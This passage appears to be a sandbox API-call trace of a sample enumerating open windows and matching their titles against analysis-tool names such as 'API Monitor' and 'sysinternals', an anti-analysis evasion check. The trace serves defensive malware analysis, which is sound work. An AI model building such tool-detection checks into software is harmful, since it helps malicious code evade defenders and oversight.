lpString1=0x430800, lpString2="Ship Loans" | out: lpString1="Ship Loans") returned="Ship Loans" [0158.801] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.801] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.801] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.801] GetClassNameA (in: hWnd=0x10168, lpClassName=0x3401e0, nMaxCount=1024 | out: 
lpClassName="ship_Loans_cls") returned 14 [0158.801] lstrcpyA (in: lpString1=0x430c00, lpString2="ship_Loans_cls" | out: lpString1="ship_Loans_cls") returned="ship_Loans_cls" [0158.802] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.802] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.802] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.802] strstr (_Str="Ship Loans", _SubStr="- main thread") returned 0x0 [0158.802] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.802] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.802] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.802] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.802] strstr (_Str="Ship Loans", _SubStr="API Monitor") returned 0x0 [0158.802] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.802] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.802] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.802] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.802] strstr (_Str="Ship Loans", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.802] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.802] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.803] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.803] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.803] 
strstr (_Str="Ship Loans", _SubStr="sysinternals") returned 0x0 [0158.803] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.803] lstrcpyA (in: lpString1=0x430400, lpString2="65892" | out: lpString1="65892") returned="65892" [0158.803] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.803] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.803] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.803] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.803] GetWindowTextA (in: hWnd=0x10164, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Clause Swaziland Complimentary") returned 30 [0158.803] lstrcpyA (in: lpString1=0x430800, lpString2="Clause Swaziland Complimentary" | out: lpString1="Clause Swaziland Complimentary") returned="Clause Swaziland Complimentary" [0158.803] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.803] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.803] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.803] GetClassNameA (in: hWnd=0x10164, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="Clause_Swaziland_complimentary_") returned 31 [0158.803] lstrcpyA (in: lpString1=0x430c00, lpString2="Clause_Swaziland_complimentary_" | out: lpString1="Clause_Swaziland_complimentary_") returned="Clause_Swaziland_complimentary_" [0158.811] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.811] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.811] lstrcpyA (in: 
lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.811] strstr (_Str="Clause Swaziland Complimentary", _SubStr="- main thread") returned 0x0 [0158.811] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.811] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.812] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.812] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.812] strstr (_Str="Clause Swaziland Complimentary", _SubStr="API Monitor") returned 0x0 [0158.812] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.812] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.812] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.812] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.812] strstr (_Str="Clause Swaziland Complimentary", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.812] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.812] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.812] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.812] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.812] strstr (_Str="Clause Swaziland Complimentary", _SubStr="sysinternals") returned 0x0 [0158.813] GetWindowTextA (in: hWnd=0x10160, lpString=0x340df8, nMaxCount=1024 | out: lpString="Chevrolet Play Mel") returned 18 [0158.813] GetClassNameA (in: hWnd=0x10160, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="chevroletplaymelwnd") returned 19 
[0158.813] strstr (_Str="Chevrolet Play Mel", _SubStr="- main thread") returned 0x0 [0158.813] strstr (_Str="Chevrolet Play Mel", _SubStr="API Monitor") returned 0x0 [0158.813] strstr (_Str="Chevrolet Play Mel", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.814] strstr (_Str="Chevrolet Play Mel", _SubStr="sysinternals") returned 0x0 [0158.814] GetWindowTextA (in: hWnd=0x2015c, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Navigation Jay") returned 14 [0158.814] GetClassNameA (in: hWnd=0x2015c, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="navigationjaywnd") returned 16 [0158.814] strstr (_Str="Navigation Jay", _SubStr="- main thread") returned 0x0 [0158.814] strstr (_Str="Navigation Jay", _SubStr="API Monitor") returned 0x0 [0158.815] strstr (_Str="Navigation Jay", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.815] strstr (_Str="Navigation Jay", _SubStr="sysinternals") returned 0x0 [0158.815] GetWindowTextA (in: hWnd=0x10158, lpString=0x340df8, nMaxCount=1024 | out: lpString="Tri") returned 3 [0158.815] GetClassNameA (in: hWnd=0x10158, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="triwnd") returned 6 [0158.815] strstr (_Str="Tri", _SubStr="- main thread") returned 0x0 [0158.815] strstr (_Str="Tri", _SubStr="API Monitor") returned 0x0 [0158.816] strstr (_Str="Tri", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.816] strstr (_Str="Tri", _SubStr="sysinternals") returned 0x0 [0158.816] GetWindowTextA (in: hWnd=0x30116, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Calls Ccd Copyright") returned 19 [0158.816] GetClassNameA (in: hWnd=0x30116, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="calls_ccd_Copyright_app") returned 23 [0158.816] strstr (_Str="Calls Ccd Copyright", _SubStr="- main thread") returned 0x0 [0158.817] strstr (_Str="Calls Ccd Copyright", _SubStr="API Monitor") returned 0x0 [0158.817] strstr (_Str="Calls Ccd Copyright", _SubStr="Blue Project Software SysTracer") 
returned 0x0 [0158.817] strstr (_Str="Calls Ccd Copyright", _SubStr="sysinternals") returned 0x0 [0158.817] GetWindowTextA (in: hWnd=0x4012c, lpString=0x340df8, nMaxCount=1024 | out: lpString="GDI+ Window") returned 11 [0158.817] GetClassNameA (in: hWnd=0x4012c, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="GDI+ Hook Window Class") returned 22 [0158.817] strstr (_Str="GDI+ Window", _SubStr="- main thread") returned 0x0 [0158.818] strstr (_Str="GDI+ Window", _SubStr="API Monitor") returned 0x0 [0158.818] strstr (_Str="GDI+ Window", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.818] strstr (_Str="GDI+ Window", _SubStr="sysinternals") returned 0x0 [0158.818] GetWindowTextA (in: hWnd=0x30126, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.818] GetClassNameA (in: hWnd=0x30126, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="ARC Window Class") returned 16 [0158.819] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.819] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.819] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.819] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.821] GetWindowTextA (in: hWnd=0x30152, lpString=0x340df8, nMaxCount=1024 | out: lpString="HiddenFaxWindow") returned 15 [0158.821] GetClassNameA (in: hWnd=0x30152, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0158.821] strstr (_Str="HiddenFaxWindow", _SubStr="- main thread") returned 0x0 [0158.821] strstr (_Str="HiddenFaxWindow", _SubStr="API Monitor") returned 0x0 [0158.821] strstr (_Str="HiddenFaxWindow", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.821] strstr (_Str="HiddenFaxWindow", _SubStr="sysinternals") returned 0x0 [0158.822] GetWindowTextA (in: hWnd=0x10148, lpString=0x3401e0, nMaxCount=1024 | out: lpString="BluetoothNotificationAreaIconWindowClass") returned 40 [0158.822] 
GetClassNameA (in: hWnd=0x10148, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0158.822] strstr (_Str="BluetoothNotificationAreaIconWindowClass", _SubStr="- main thread") returned 0x0 [0158.822] strstr (_Str="BluetoothNotificationAreaIconWindowClass", _SubStr="API Monitor") returned 0x0 [0158.822] strstr (_Str="BluetoothNotificationAreaIconWindowClass", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.823] strstr (_Str="BluetoothNotificationAreaIconWindowClass", _SubStr="sysinternals") returned 0x0 [0158.823] GetWindowTextA (in: hWnd=0x10146, lpString=0x340df8, nMaxCount=1024 | out: lpString="MS_WebcheckMonitor") returned 18 [0158.823] GetClassNameA (in: hWnd=0x10146, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0158.823] strstr (_Str="MS_WebcheckMonitor", _SubStr="- main thread") returned 0x0 [0158.823] strstr (_Str="MS_WebcheckMonitor", _SubStr="API Monitor") returned 0x0 [0158.823] strstr (_Str="MS_WebcheckMonitor", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.825] strstr (_Str="MS_WebcheckMonitor", _SubStr="sysinternals") returned 0x0 [0158.825] GetWindowTextA (in: hWnd=0x60074, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.826] GetClassNameA (in: hWnd=0x60074, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="PNIHiddenWnd") returned 12 [0158.826] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.826] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.826] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.826] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.826] GetWindowTextA (in: hWnd=0x10132, lpString=0x340df8, nMaxCount=1024 | out: lpString="Media Center SSO") returned 16 [0158.827] GetClassNameA (in: hWnd=0x10132, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="Media Center SSO") returned 16 [0158.827] strstr 
(_Str="Media Center SSO", _SubStr="- main thread") returned 0x0 [0158.827] strstr (_Str="Media Center SSO", _SubStr="API Monitor") returned 0x0 [0158.827] strstr (_Str="Media Center SSO", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.827] strstr (_Str="Media Center SSO", _SubStr="sysinternals") returned 0x0 [0158.828] GetWindowTextA (in: hWnd=0x20020, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.828] GetClassNameA (in: hWnd=0x20020, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="ATL:000007FEFC0541F0") returned 20 [0158.828] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.828] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.828] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.828] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.829] GetWindowTextA (in: hWnd=0x20016, lpString=0x340df8, nMaxCount=1024 | out: lpString="Battery Meter") returned 13 [0158.829] GetClassNameA (in: hWnd=0x20016, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="SystemTray_Main") returned 15 [0158.829] strstr (_Str="Battery Meter", _SubStr="- main thread") returned 0x0 [0158.829] strstr (_Str="Battery Meter", _SubStr="API Monitor") returned 0x0 [0158.829] strstr (_Str="Battery Meter", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.830] strstr (_Str="Battery Meter", _SubStr="sysinternals") returned 0x0 [0158.830] GetWindowTextA (in: hWnd=0x2001c, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.830] GetClassNameA (in: hWnd=0x2001c, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0158.830] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.830] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.830] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.831] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.831] GetWindowTextA (in: hWnd=0x10124, 
lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.831] GetClassNameA (in: hWnd=0x10124, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0158.831] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.831] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.831] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.831] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.832] GetWindowTextA (in: hWnd=0x1011e, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.832] GetClassNameA (in: hWnd=0x1011e, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0158.832] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.832] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.832] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.832] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.833] GetWindowTextA (in: hWnd=0x1011a, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.833] GetClassNameA (in: hWnd=0x1011a, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0158.833] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.833] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.833] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.833] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.833] GetWindowTextA (in: hWnd=0x10100, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.834] GetClassNameA (in: hWnd=0x10100, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.834] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.834] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.834] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.834] strstr (_Str="", _SubStr="sysinternals") 
returned 0x0 [0158.834] GetWindowTextA (in: hWnd=0x100fc, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.834] GetClassNameA (in: hWnd=0x100fc, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0158.835] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.835] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.835] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.836] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.836] GetWindowTextA (in: hWnd=0x100ee, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.836] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0158.836] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.836] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.836] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.837] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.837] GetWindowTextA (in: hWnd=0x100e4, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.837] GetClassNameA (in: hWnd=0x100e4, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.837] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.837] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.837] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.837] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.838] GetWindowTextA (in: hWnd=0x100de, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.838] GetClassNameA (in: hWnd=0x100de, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.838] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.838] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.838] 
strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.838] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.839] GetWindowTextA (in: hWnd=0x200d8, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.839] GetClassNameA (in: hWnd=0x200d8, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.839] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.839] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.839] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.839] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.840] GetWindowTextA (in: hWnd=0x100c0, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Start menu") returned 10 [0158.840] GetClassNameA (in: hWnd=0x100c0, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="DV2ControlHost") returned 14 [0158.840] strstr (_Str="Start menu", _SubStr="- main thread") returned 0x0 [0158.840] strstr (_Str="Start menu", _SubStr="API Monitor") returned 0x0 [0158.840] strstr (_Str="Start menu", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.840] strstr (_Str="Start menu", _SubStr="sysinternals") returned 0x0 [0158.840] GetWindowTextA (in: hWnd=0x500b6, lpString=0x340df8, nMaxCount=1024 | out: lpString="Jump List") returned 9 [0158.841] GetClassNameA (in: hWnd=0x500b6, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="DV2ControlHost") returned 14 [0158.841] strstr (_Str="Jump List", _SubStr="- main thread") returned 0x0 [0158.841] strstr (_Str="Jump List", _SubStr="API Monitor") returned 0x0 [0158.841] strstr (_Str="Jump List", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.841] strstr (_Str="Jump List", _SubStr="sysinternals") returned 0x0 [0158.841] GetWindowTextA (in: hWnd=0x100ac, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.842] GetClassNameA (in: hWnd=0x100ac, lpClassName=0x340df8, nMaxCount=1024 | out: 
lpClassName="WorkerW") returned 7 [0158.842] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.842] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.842] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.842] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.842] GetWindowTextA (in: hWnd=0x100aa, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.843] GetClassNameA (in: hWnd=0x100aa, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0158.843] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.843] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.843] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.843] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.843] GetWindowTextA (in: hWnd=0x100a0, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.844] GetClassNameA (in: hWnd=0x100a0, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.844] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.844] GetWindowTextA (in: hWnd=0x1008c, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.844] GetClassNameA (in: hWnd=0x1008c, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.845] GetWindowTextA (in: hWnd=0x10088, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.845] GetClassNameA (in: hWnd=0x10088, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0158.845] GetWindowTextA (in: hWnd=0x10066, lpString=0x340df8, nMaxCount=1024 | out: lpString="TaskEng - Task Scheduler Engine Process") returned 39 [0158.846] GetClassNameA (in: hWnd=0x10066, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0158.846] GetWindowTextA (in: hWnd=0x10060, lpString=0x3401e0, nMaxCount=1024 | out: 
lpString="MCI command handling window") returned 27 [0158.846] GetClassNameA (in: hWnd=0x10060, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="#43") returned 3 [0158.847] GetWindowTextA (in: hWnd=0x10058, lpString=0x340df8, nMaxCount=1024 | out: lpString="TaskEng - Task Scheduler Engine Process") returned 39 [0158.847] GetClassNameA (in: hWnd=0x10058, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0158.847] GetWindowTextA (in: hWnd=0x10052, lpString=0x3401e0, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0158.848] GetClassNameA (in: hWnd=0x10052, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0158.848] GetWindowTextA (in: hWnd=0x1004a, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.848] GetClassNameA (in: hWnd=0x1004a, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0158.849] GetWindowTextA (in: hWnd=0x20046, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.849] GetClassNameA (in: hWnd=0x20046, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0158.849] GetWindowTextA (in: hWnd=0x30040, lpString=0x340df8, nMaxCount=1024 | out: lpString="Task Host Window") returned 16 [0158.849] GetClassNameA (in: hWnd=0x30040, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0158.850] GetWindowTextA (in: hWnd=0x10044, lpString=0x3401e0, nMaxCount=1024 | out: lpString="DWM Notification Window") returned 23 [0158.850] GetClassNameA (in: hWnd=0x10044, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="Dwm") returned 3 [0158.851] GetWindowTextA (in: hWnd=0x1005c, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.851] GetClassNameA (in: hWnd=0x1005c, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="CicLoaderWndClass") returned 17 [0158.852] GetWindowTextA (in: hWnd=0x2007a, 
lpString=0x3401e0, nMaxCount=1024 | out: lpString="Program Manager") returned 15 [0158.852] GetClassNameA (in: hWnd=0x2007a, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="Progman") returned 7 [0158.853] GetWindowTextA (in: hWnd=0x1013a, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.853] GetClassNameA (in: hWnd=0x1013a, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.853] GetWindowTextA (in: hWnd=0x10076, lpString=0x3401e0, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0158.853] GetClassNameA (in: hWnd=0x10076, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0158.854] GetWindowTextA (in: hWnd=0x10054, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.854] GetClassNameA (in: hWnd=0x10054, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.854] GetWindowTextA (in: hWnd=0x1021c, lpString=0x3401e0, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0158.855] GetClassNameA (in: hWnd=0x1021c, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0158.855] GetWindowTextA (in: hWnd=0x201a4, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.855] GetClassNameA (in: hWnd=0x201a4, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.856] GetWindowTextA (in: hWnd=0x1019a, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.856] GetClassNameA (in: hWnd=0x1019a, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.856] GetWindowTextA (in: hWnd=0x10196, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.857] GetClassNameA (in: hWnd=0x10196, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.857] GetWindowTextA (in: hWnd=0x10192, lpString=0x3401e0, nMaxCount=1024 | out: 
lpString="Default IME") returned 11 [0158.857] GetClassNameA (in: hWnd=0x10192, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.858] GetWindowTextA (in: hWnd=0x1018e, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.858] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.858] GetWindowTextA (in: hWnd=0x1018a, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.858] GetClassNameA (in: hWnd=0x1018a, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.859] GetWindowTextA (in: hWnd=0x10186, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.859] GetClassNameA (in: hWnd=0x10186, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.859] GetWindowTextA (in: hWnd=0x10182, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.860] GetClassNameA (in: hWnd=0x10182, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.860] GetWindowTextA (in: hWnd=0x1017e, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.860] GetClassNameA (in: hWnd=0x1017e, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.861] GetWindowTextA (in: hWnd=0x1017a, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.861] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0158.861] GetWindowTextA (in: hWnd=0x10176, lpString=0x340df8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0158.862] GetClassNameA (in: 